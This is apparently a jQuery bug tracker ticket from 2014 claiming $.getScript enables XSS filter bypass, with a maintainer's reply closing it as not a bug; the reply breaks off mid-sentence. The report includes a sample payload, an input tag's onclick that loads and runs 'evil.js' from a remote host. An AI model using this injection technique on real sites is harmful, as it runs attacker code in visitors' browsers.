Side navigation
#15166 closed bug (notabug)
Opened June 25, 2014 08:12AM UTC
Closed June 25, 2014 01:20PM UTC
$.getScript Function may cause XSS attack
| Reported by: | lupin | Owned by: | |
|---|---|---|---|
| Priority: | high | Milestone: | None |
| Component: | ajax | Version: | 1.11.1 |
| Keywords: | getScript | Cc: | |
| Blocked by: | Blocking: |
Description
$.getScript and can load JavaScript file from remote server,then execute it.
In some cases,if a attack can control this function or its parameter,this Function may cause XSS attack.
For example,if an attacker can control a HTML TAG (such as input tag).
<input type=text onclick=...>
An attacker can control the OnClick Event,but the web app filter evil characters(<script>,doucment...).In this case XSS can not occur,but if the web page contains JQuery library,the attacker can bypass the Filter Mechanism using $.getScript Function,like this.
<input type=text onclick=$.getScript('http://jquery.com/evil.js')>
The attacker put evil.js on his remote server,this JavaScript File contains evil JavaScript code.When a user click the input tag ,the evil javascript code will execute.
I think JQuery Libiary should add a white list,a web can only load a JavaScript File from current domain by default,if a web need to load a JavaScript File from remote server,the developer have to add the domain into the white list.
Attachments (0)
Change History (1)
Changed June 25, 2014 01:20PM UTC by comment:1
| resolution: | → notabug |
|---|---|
| status: | new → closed |
This is an "airtight hatchway" problem. If an attacker has the ability to run
$.getScriptthey can run any script. If an attacker has the ability to inject arbitrary HTML in some way then the developer has made a mistake already.Wouldn't the
onclickattribute just add itself to the whitelist before calling$.getScriptthen?Sorry but
$.getScriptis intended to get scripts, including ones from other origins. It's done that for years. We can't add hurdles that would break a lot of existing code to